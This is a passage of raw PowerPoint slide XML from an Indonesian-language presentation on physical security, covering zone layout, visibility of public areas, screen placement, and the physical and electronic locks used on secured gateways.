              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona-zona. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Arus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keluar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>" dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyeberang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Berikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>visibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghalangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> gateway, port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diam-diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyederhanakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengawasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Di zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>posisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tampilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jalur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jendela</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Gunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jendela</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168</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="322876529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Gerbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> gateway, gateway </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilengkapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Gateway yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menutup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menutup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menguncinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikategorikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konvensional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dioperasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jenis yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mahal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencongkelan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Elektronik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beroperasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PIN pada keypad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>elektronik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kombinasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>anak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kartu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gesek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>magnetik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilengkapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
